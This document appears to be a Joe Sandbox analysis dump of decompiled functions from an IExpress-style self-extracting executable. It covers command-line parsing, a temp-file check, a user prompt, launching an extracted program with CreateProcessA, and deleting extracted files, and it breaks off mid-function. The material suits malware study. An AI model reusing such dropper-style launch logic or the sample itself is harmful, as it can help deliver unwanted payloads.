                                                                      				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                      				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                      				_t53 = 0;
                                                                      				while(1) {
                                                                      					asm("lock cmpxchg [edx], ecx");
                                                                      					if(0 == 0) {
                                                                      						break;
                                                                      					}
                                                                      					if(0 != _t56) {
                                                                      						Sleep(0x3e8);
                                                                      						continue;
                                                                      					} else {
                                                                      						_t58 = 1;
                                                                      						_t53 = 1;
                                                                      					}
                                                                      					L7:
                                                                      					_t67 =  *0xf888b0 - _t58; // 0x2
                                                                      					if(_t67 != 0) {
                                                                      						__eflags =  *0xf888b0; // 0x2
                                                                      						if(__eflags != 0) {
                                                                      							 *0xf881e4 = _t58;
                                                                      							goto L13;
                                                                      						} else {
                                                                      							 *0xf888b0 = _t58;
                                                                      							_t37 = E00F86C3F(0xf810b8, 0xf810c4); // executed
                                                                      							__eflags = _t37;
                                                                      							if(__eflags == 0) {
                                                                      								goto L13;
                                                                      							} else {
                                                                      								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                      								_t30 = 0xff;
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						_push(0x1f);
                                                                      						L00F86FF4();
                                                                      						L13:
                                                                      						_t68 =  *0xf888b0 - _t58; // 0x2
                                                                      						if(_t68 == 0) {
                                                                      							_push(0xf810b4);
                                                                      							_push(0xf810ac);
                                                                      							L00F87202();
                                                                      							 *0xf888b0 = 2;
                                                                      						}
                                                                      						if(_t53 == 0) {
                                                                      							 *0xf888ac = 0;
                                                                      						}
                                                                      						_t71 =  *0xf888b4;
                                                                      						if( *0xf888b4 != 0 && E00F87060(_t71, 0xf888b4) != 0) {
                                                                      							_t60 =  *0xf888b4; // 0x0
                                                                      							 *0xf8a288(0, 2, 0);
                                                                      							 *_t60();
                                                                      						}
                                                                      						_t25 = __imp___acmdln; // 0x74895b9c
                                                                      						_t59 =  *_t25;
                                                                      						 *(_t62 - 0x1c) = _t59;
                                                                      						_t54 =  *(_t62 - 0x20);
                                                                      						while(1) {
                                                                      							_t41 =  *_t59;
                                                                      							if(_t41 > 0x20) {
                                                                      								goto L32;
                                                                      							}
                                                                      							if(_t41 != 0) {
                                                                      								if(_t54 != 0) {
                                                                      									goto L32;
                                                                      								} else {
                                                                      									while(_t41 != 0 && _t41 <= 0x20) {
                                                                      										_t59 = _t59 + 1;
                                                                      										 *(_t62 - 0x1c) = _t59;
                                                                      										_t41 =  *_t59;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                      							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                      								_t29 = 0xa;
                                                                      							} else {
                                                                      								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                      							}
                                                                      							_push(_t29);
                                                                      							_t30 = E00F82BFB(0xf80000, 0, _t59); // executed
                                                                      							 *0xf881e0 = _t30;
                                                                      							__eflags =  *0xf881f8;
                                                                      							if( *0xf881f8 == 0) {
                                                                      								exit(_t30); // executed
                                                                      								goto L32;
                                                                      							}
                                                                      							__eflags =  *0xf881e4;
                                                                      							if( *0xf881e4 == 0) {
                                                                      								__imp___cexit();
                                                                      								_t30 =  *0xf881e0; // 0x0
                                                                      							}
                                                                      							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                      							goto L40;
                                                                      							L32:
                                                                      							__eflags = _t41 - 0x22;
                                                                      							if(_t41 == 0x22) {
                                                                      								__eflags = _t54;
                                                                      								_t15 = _t54 == 0;
                                                                      								__eflags = _t15;
                                                                      								_t54 = 0 | _t15;
                                                                      								 *(_t62 - 0x20) = _t54;
                                                                      							}
                                                                      							_t26 = _t41 & 0x000000ff;
                                                                      							__imp___ismbblead(_t26);
                                                                      							__eflags = _t26;
                                                                      							if(_t26 != 0) {
                                                                      								_t59 = _t59 + 1;
                                                                      								__eflags = _t59;
                                                                      								 *(_t62 - 0x1c) = _t59;
                                                                      							}
                                                                      							_t59 = _t59 + 1;
                                                                      							 *(_t62 - 0x1c) = _t59;
                                                                      						}
                                                                      					}
                                                                      					L40:
                                                                      					return E00F8724D(_t30);
                                                                      				}
                                                                      				_t58 = 1;
                                                                      				__eflags = 1;
                                                                      				goto L7;
                                                                      			}


















                                                                      0x00f86a60
                                                                      0x00f86a6a
                                                                      0x00f86a6c
                                                                      0x00f86a71
                                                                      0x00f86a78
                                                                      0x00f86a7f
                                                                      0x00f86a85
                                                                      0x00f86a8e
                                                                      0x00f86a91
                                                                      0x00f86a93
                                                                      0x00f86a9c
                                                                      0x00f86aa2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f86aa6
                                                                      0x00f86ab4
                                                                      0x00000000
                                                                      0x00f86aa8
                                                                      0x00f86aaa
                                                                      0x00f86aab
                                                                      0x00f86aab
                                                                      0x00f86abf
                                                                      0x00f86abf
                                                                      0x00f86ac5
                                                                      0x00f86ad1
                                                                      0x00f86ad7
                                                                      0x00f86b05
                                                                      0x00000000
                                                                      0x00f86ad9
                                                                      0x00f86ad9
                                                                      0x00f86ae9
                                                                      0x00f86af0
                                                                      0x00f86af2
                                                                      0x00000000
                                                                      0x00f86af4
                                                                      0x00f86af4
                                                                      0x00f86afb
                                                                      0x00f86afb
                                                                      0x00f86af2
                                                                      0x00f86ac7
                                                                      0x00f86ac7
                                                                      0x00f86ac9
                                                                      0x00f86b0b
                                                                      0x00f86b0b
                                                                      0x00f86b11
                                                                      0x00f86b13
                                                                      0x00f86b18
                                                                      0x00f86b1d
                                                                      0x00f86b24
                                                                      0x00f86b24
                                                                      0x00f86b30
                                                                      0x00f86b39
                                                                      0x00f86b39
                                                                      0x00f86b3b
                                                                      0x00f86b42
                                                                      0x00f86b57
                                                                      0x00f86b5f
                                                                      0x00f86b65
                                                                      0x00f86b65
                                                                      0x00f86b67
                                                                      0x00f86b6c
                                                                      0x00f86b6e
                                                                      0x00f86b71
                                                                      0x00f86b74
                                                                      0x00f86b74
                                                                      0x00f86b79
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f86b7d
                                                                      0x00f86b81
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f86b83
                                                                      0x00f86b8c
                                                                      0x00f86b8d
                                                                      0x00f86b90
                                                                      0x00f86b90
                                                                      0x00f86b83
                                                                      0x00f86b81
                                                                      0x00f86b94
                                                                      0x00f86b98
                                                                      0x00f86ba2
                                                                      0x00f86b9a
                                                                      0x00f86b9a
                                                                      0x00f86b9a
                                                                      0x00f86ba3
                                                                      0x00f86bab
                                                                      0x00f86bb0
                                                                      0x00f86bb5
                                                                      0x00f86bbc
                                                                      0x00f86bbf
                                                                      0x00000000
                                                                      0x00f86bbf
                                                                      0x00f86c1e
                                                                      0x00f86c25
                                                                      0x00f86c27
                                                                      0x00f86c2d
                                                                      0x00f86c2d
                                                                      0x00f86c32
                                                                      0x00000000
                                                                      0x00f86bc5
                                                                      0x00f86bc5
                                                                      0x00f86bc8
                                                                      0x00f86bcc
                                                                      0x00f86bce
                                                                      0x00f86bce
                                                                      0x00f86bd1
                                                                      0x00f86bd3
                                                                      0x00f86bd3
                                                                      0x00f86bd6
                                                                      0x00f86bda
                                                                      0x00f86be1
                                                                      0x00f86be3
                                                                      0x00f86be5
                                                                      0x00f86be5
                                                                      0x00f86be6
                                                                      0x00f86be6
                                                                      0x00f86be9
                                                                      0x00f86bea
                                                                      0x00f86bea
                                                                      0x00f86b74
                                                                      0x00f86c39
                                                                      0x00f86c3e
                                                                      0x00f86c3e
                                                                      0x00f86abe
                                                                      0x00f86abe
                                                                      0x00000000

                                                                      APIs
                                                                        • Part of subcall function 00F87155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00F87182
                                                                        • Part of subcall function 00F87155: GetCurrentProcessId.KERNEL32 ref: 00F87191
                                                                        • Part of subcall function 00F87155: GetCurrentThreadId.KERNEL32 ref: 00F8719A
                                                                        • Part of subcall function 00F87155: GetTickCount.KERNEL32 ref: 00F871A3
                                                                        • Part of subcall function 00F87155: QueryPerformanceCounter.KERNEL32(?), ref: 00F871B8
                                                                      • GetStartupInfoW.KERNEL32(?,00F872B8,00000058), ref: 00F86A7F
                                                                      • Sleep.KERNEL32(000003E8), ref: 00F86AB4
                                                                      • _amsg_exit.MSVCRT ref: 00F86AC9
                                                                      • _initterm.MSVCRT ref: 00F86B1D
                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00F86B49
                                                                      • exit.KERNELBASE ref: 00F86BBF
                                                                      • _ismbblead.MSVCRT ref: 00F86BDA
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                      • String ID:
                                                                      • API String ID: 836923961-0
                                                                      • Opcode ID: c1a994f87e7c1a1427cc4e48b9cf580d1dec9f56957ef8da1574bbf1186292f1
                                                                      • Instruction ID: 46546831d4c8cef33a28ba882718b2b2008e84eaeb7e2adfc231b729367f3129
                                                                      • Opcode Fuzzy Hash: c1a994f87e7c1a1427cc4e48b9cf580d1dec9f56957ef8da1574bbf1186292f1
                                                                      • Instruction Fuzzy Hash: 6141C0319447288BEB21BB649C497FA77A4FB84775F64012AE841E7290CF788842BB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 587 f858c8-f858d5 588 f858d8-f858dd 587->588 588->588 589 f858df-f858f1 LocalAlloc 588->589 590 f85919-f85959 call f81680 call f8658a CreateFileA LocalFree 589->590 591 f858f3-f85901 call f844b9 589->591 594 f85906-f85910 call f86285 590->594 600 f8595b-f8596c CloseHandle GetFileAttributesA 590->600 591->594 601 f85912-f85918 594->601 600->594 602 f8596e-f85970 600->602 602->594 603 f85972-f8597b 602->603 603->601
                                                                      C-Code - Quality: 95%
                                                                      			E00F858C8(intOrPtr* __ecx) {
                                                                      				void* _v8;
                                                                      				intOrPtr _t6;
                                                                      				void* _t10;
                                                                      				void* _t12;
                                                                      				void* _t14;
                                                                      				signed char _t16;
                                                                      				void* _t20;
                                                                      				void* _t23;
                                                                      				intOrPtr* _t27;
                                                                      				CHAR* _t33;
                                                                      
                                                                      				_push(__ecx);
                                                                      				_t33 = __ecx;
                                                                      				_t27 = __ecx;
                                                                      				_t23 = __ecx + 1;
                                                                      				do {
                                                                      					_t6 =  *_t27;
                                                                      					_t27 = _t27 + 1;
                                                                      				} while (_t6 != 0);
                                                                      				_t36 = _t27 - _t23 + 0x14;
                                                                      				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                      				if(_t20 != 0) {
                                                                      					E00F81680(_t20, _t36, _t33);
                                                                      					E00F8658A(_t20, _t36, "TMP4351$.TMP");
                                                                      					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                      					_v8 = _t10;
                                                                      					LocalFree(_t20);
                                                                      					_t12 = _v8;
                                                                      					if(_t12 == 0xffffffff) {
                                                                      						goto L4;
                                                                      					} else {
                                                                      						CloseHandle(_t12);
                                                                      						_t16 = GetFileAttributesA(_t33); // executed
                                                                      						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                      							goto L4;
                                                                      						} else {
                                                                      							 *0xf89124 = 0;
                                                                      							_t14 = 1;
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					E00F844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                      					L4:
                                                                      					 *0xf89124 = E00F86285();
                                                                      					_t14 = 0;
                                                                      				}
                                                                      				return _t14;
                                                                      			}













                                                                      0x00f858cd
                                                                      0x00f858d1
                                                                      0x00f858d3
                                                                      0x00f858d5
                                                                      0x00f858d8
                                                                      0x00f858d8
                                                                      0x00f858da
                                                                      0x00f858db
                                                                      0x00f858e1
                                                                      0x00f858ed
                                                                      0x00f858f1
                                                                      0x00f8591e
                                                                      0x00f8592c
                                                                      0x00f85943
                                                                      0x00f8594a
                                                                      0x00f8594d
                                                                      0x00f85953
                                                                      0x00f85959
                                                                      0x00000000
                                                                      0x00f8595b
                                                                      0x00f8595c
                                                                      0x00f85963
                                                                      0x00f8596c
                                                                      0x00000000
                                                                      0x00f85972
                                                                      0x00f85974
                                                                      0x00f8597a
                                                                      0x00f8597a
                                                                      0x00f8596c
                                                                      0x00f858f3
                                                                      0x00f85901
                                                                      0x00f85906
                                                                      0x00f8590b
                                                                      0x00f85910
                                                                      0x00f85910
                                                                      0x00f85918

                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00F85534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F858E7
                                                                      • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00F85534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F85943
                                                                      • LocalFree.KERNEL32(00000000,?,00F85534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8594D
                                                                      • CloseHandle.KERNEL32(00000000,?,00F85534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8595C
                                                                      • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00F85534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F85963
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
                                                                      • API String ID: 747627703-2825630923
                                                                      • Opcode ID: 890e09afecfe78b68075f32006557d0b0a2e9def032f2f2e1a2faf55e33f3324
                                                                      • Instruction ID: 51b37ddd8d63077803ca8cf1a18652c6ccbfc02d8de643a8a774e3ff36a2d210
                                                                      • Opcode Fuzzy Hash: 890e09afecfe78b68075f32006557d0b0a2e9def032f2f2e1a2faf55e33f3324
                                                                      • Instruction Fuzzy Hash: 1E113831B0061467DB207FB95C4DBEB7E9DEF45770B100616F505D31D1DA74D806A7A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 631 f83fef-f84010 632 f8410a-f8411a call f86ce0 631->632 633 f84016-f8403b CreateProcessA 631->633 635 f84041-f8406e WaitForSingleObject GetExitCodeProcess 633->635 636 f840c4-f84101 call f86285 GetLastError FormatMessageA call f844b9 633->636 637 f84070-f84077 635->637 638 f84091 call f8411b 635->638 650 f84106 636->650 637->638 641 f84079-f8407b 637->641 645 f84096-f840b8 CloseHandle * 2 638->645 641->638 644 f8407d-f84089 641->644 644->638 647 f8408b 644->647 648 f84108 645->648 649 f840ba-f840c0 645->649 647->638 648->632 649->648 651 f840c2 649->651 650->648 651->650
                                                                      C-Code - Quality: 84%
                                                                      			E00F83FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                      				signed int _v8;
                                                                      				char _v524;
                                                                      				long _v528;
                                                                      				struct _PROCESS_INFORMATION _v544;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t20;
                                                                      				void* _t22;
                                                                      				int _t25;
                                                                      				intOrPtr* _t39;
                                                                      				signed int _t44;
                                                                      				void* _t49;
                                                                      				signed int _t50;
                                                                      				intOrPtr _t53;
                                                                      
                                                                      				_t45 = __edx;
                                                                      				_t20 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t20 ^ _t50;
                                                                      				_t39 = __ecx;
                                                                      				_t49 = 1;
                                                                      				_t22 = 0;
                                                                      				if(__ecx == 0) {
                                                                      					L13:
                                                                      					return E00F86CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                      				}
                                                                      				asm("stosd");
                                                                      				asm("stosd");
                                                                      				asm("stosd");
                                                                      				asm("stosd");
                                                                      				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                      				if(_t25 == 0) {
                                                                      					 *0xf89124 = E00F86285();
                                                                      					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                                      					_t45 = 0x4c4;
                                                                      					E00F844B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                                      					L11:
                                                                      					_t49 = 0;
                                                                      					L12:
                                                                      					_t22 = _t49;
                                                                      					goto L13;
                                                                      				}
                                                                      				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                      				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                      				_t44 = _v528;
                                                                      				_t53 =  *0xf88a28; // 0x0
                                                                      				if(_t53 == 0) {
                                                                      					_t34 =  *0xf89a2c; // 0x0
                                                                      					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                      						_t34 = _t44 & 0xff000000;
                                                                      						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                      							 *0xf89a2c = _t44;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				E00F8411B(_t34, _t44);
                                                                      				CloseHandle(_v544.hThread);
                                                                      				CloseHandle(_v544);
                                                                      				if(( *0xf89a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                      					goto L12;
                                                                      				} else {
                                                                      					goto L11;
                                                                      				}
                                                                      			}


















                                                                      0x00f83fef
                                                                      0x00f83ffa
                                                                      0x00f84001
                                                                      0x00f84008
                                                                      0x00f8400a
                                                                      0x00f8400b
                                                                      0x00f84010
                                                                      0x00f8410a
                                                                      0x00f8411a
                                                                      0x00f8411a
                                                                      0x00f8401c
                                                                      0x00f8401d
                                                                      0x00f8401e
                                                                      0x00f8401f
                                                                      0x00f84033
                                                                      0x00f8403b
                                                                      0x00f840ca
                                                                      0x00f840e9
                                                                      0x00f840f8
                                                                      0x00f84101
                                                                      0x00f84106
                                                                      0x00f84106
                                                                      0x00f84108
                                                                      0x00f84108
                                                                      0x00000000
                                                                      0x00f84108
                                                                      0x00f84049
                                                                      0x00f8405c
                                                                      0x00f84062
                                                                      0x00f84068
                                                                      0x00f8406e
                                                                      0x00f84070
                                                                      0x00f84077
                                                                      0x00f8407f
                                                                      0x00f84089
                                                                      0x00f8408b
                                                                      0x00f8408b
                                                                      0x00f84089
                                                                      0x00f84077
                                                                      0x00f84091
                                                                      0x00f8409c
                                                                      0x00f840a8
                                                                      0x00f840b8
                                                                      0x00000000
                                                                      0x00f840c2
                                                                      0x00000000
                                                                      0x00f840c2

                                                                      APIs
                                                                      • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00F84033
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F84049
                                                                      • GetExitCodeProcess.KERNELBASE ref: 00F8405C
                                                                      • CloseHandle.KERNEL32(?), ref: 00F8409C
                                                                      • CloseHandle.KERNEL32(?), ref: 00F840A8
                                                                      • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00F840DC
                                                                      • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00F840E9
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                      • String ID:
                                                                      • API String ID: 3183975587-0
                                                                      • Opcode ID: cdcebd515a4a9028288cdbcd648a4c7148802f9973102e15d75e420f1072a7e1
                                                                      • Instruction ID: 199093de1051b3df53d0adc137158c5def39e71106483e3b0d0d6270f1add08a
                                                                      • Opcode Fuzzy Hash: cdcebd515a4a9028288cdbcd648a4c7148802f9973102e15d75e420f1072a7e1
                                                                      • Instruction Fuzzy Hash: A831AE31A4061CABEB21AB65DC4DFFB777CEB94711F1001AAFA05E21A1CA345D85EF21
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 652 f851e5-f8520b call f8468f LocalAlloc 655 f8522d-f8523c call f8468f 652->655 656 f8520d-f85228 call f844b9 call f86285 652->656 662 f8523e-f85260 call f844b9 LocalFree 655->662 663 f85262-f85270 lstrcmpA 655->663 668 f852b0 656->668 662->668 666 f8527e-f8529c call f844b9 LocalFree 663->666 667 f85272-f85273 LocalFree 663->667 674 f8529e-f852a4 666->674 675 f852a6 666->675 670 f85279-f8527c 667->670 673 f852b2-f852b5 668->673 670->673 674->670 675->668
                                                                      C-Code - Quality: 100%
                                                                      			E00F851E5(void* __eflags) {
                                                                      				int _t5;
                                                                      				void* _t6;
                                                                      				void* _t28;
                                                                      
                                                                      				_t1 = E00F8468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                      				_t28 = LocalAlloc(0x40, _t1);
                                                                      				if(_t28 != 0) {
                                                                      					if(E00F8468F("UPROMPT", _t28, _t29) != 0) {
                                                                      						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                      						if(_t5 != 0) {
                                                                      							_t6 = E00F844B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                      							LocalFree(_t28);
                                                                      							if(_t6 != 6) {
                                                                      								 *0xf89124 = 0x800704c7;
                                                                      								L10:
                                                                      								return 0;
                                                                      							}
                                                                      							 *0xf89124 = 0;
                                                                      							L6:
                                                                      							return 1;
                                                                      						}
                                                                      						LocalFree(_t28);
                                                                      						goto L6;
                                                                      					}
                                                                      					E00F844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                      					LocalFree(_t28);
                                                                      					 *0xf89124 = 0x80070714;
                                                                      					goto L10;
                                                                      				}
                                                                      				E00F844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                      				 *0xf89124 = E00F86285();
                                                                      				goto L10;
                                                                      			}






                                                                      0x00f851fb
                                                                      0x00f85207
                                                                      0x00f8520b
                                                                      0x00f8523c
                                                                      0x00f85268
                                                                      0x00f85270
                                                                      0x00f8528b
                                                                      0x00f85293
                                                                      0x00f8529c
                                                                      0x00f852a6
                                                                      0x00f852b0
                                                                      0x00000000
                                                                      0x00f852b0
                                                                      0x00f8529e
                                                                      0x00f85279
                                                                      0x00000000
                                                                      0x00f8527b
                                                                      0x00f85273
                                                                      0x00000000
                                                                      0x00f85273
                                                                      0x00f8524a
                                                                      0x00f85250
                                                                      0x00f85256
                                                                      0x00000000
                                                                      0x00f85256
                                                                      0x00f85219
                                                                      0x00f85223
                                                                      0x00000000

                                                                      APIs
                                                                        • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                        • Part of subcall function 00F8468F: SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                        • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                        • Part of subcall function 00F8468F: LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
                                                                        • Part of subcall function 00F8468F: LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                        • Part of subcall function 00F8468F: memcpy_s.MSVCRT ref: 00F846E5
                                                                        • Part of subcall function 00F8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00F82F4D,?,00000002,00000000), ref: 00F85201
                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00F85250
                                                                        • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                        • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F84554
                                                                        • Part of subcall function 00F86285: GetLastError.KERNEL32(00F85BBC), ref: 00F86285
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                      • String ID: <None>$UPROMPT
                                                                      • API String ID: 957408736-2980973527
                                                                      • Opcode ID: 92c475a7174f68f1b73238ce3965e552744e114811dd947469d68241c9a0b298
                                                                      • Instruction ID: 80fe45499ac5be4e62e27504f42fdaa6b792f037b3edd6d83b8da152c9a7424e
                                                                      • Opcode Fuzzy Hash: 92c475a7174f68f1b73238ce3965e552744e114811dd947469d68241c9a0b298
                                                                      • Instruction Fuzzy Hash: 9B110872704605ABE714BBB15C8AFFB719DEB89B50B104429FA02D5190EEBC9C017325
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 74%
                                                                      			E00F852B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				signed int _t9;
                                                                      				signed int _t11;
                                                                      				void* _t21;
                                                                      				void* _t29;
                                                                      				CHAR** _t31;
                                                                      				void* _t32;
                                                                      				signed int _t33;
                                                                      
                                                                      				_t28 = __edi;
                                                                      				_t22 = __ecx;
                                                                      				_t21 = __ebx;
                                                                      				_t9 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t9 ^ _t33;
                                                                      				_push(__esi);
                                                                      				_t31 =  *0xf891e0; // 0x798408
                                                                      				if(_t31 != 0) {
                                                                      					_push(__edi);
                                                                      					do {
                                                                      						_t29 = _t31;
                                                                      						if( *0xf88a24 == 0 &&  *0xf89a30 == 0) {
                                                                      							SetFileAttributesA( *_t31, 0x80); // executed
                                                                      							DeleteFileA( *_t31); // executed
                                                                      						}
                                                                      						_t31 = _t31[1];
                                                                      						LocalFree( *_t29);
                                                                      						LocalFree(_t29);
                                                                      					} while (_t31 != 0);
                                                                      					_pop(_t28);
                                                                      				}
                                                                      				_t11 =  *0xf88a20; // 0x0
                                                                      				_pop(_t32);
                                                                      				if(_t11 != 0 &&  *0xf88a24 == 0 &&  *0xf89a30 == 0) {
                                                                      					_push(_t22);
                                                                      					E00F81781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
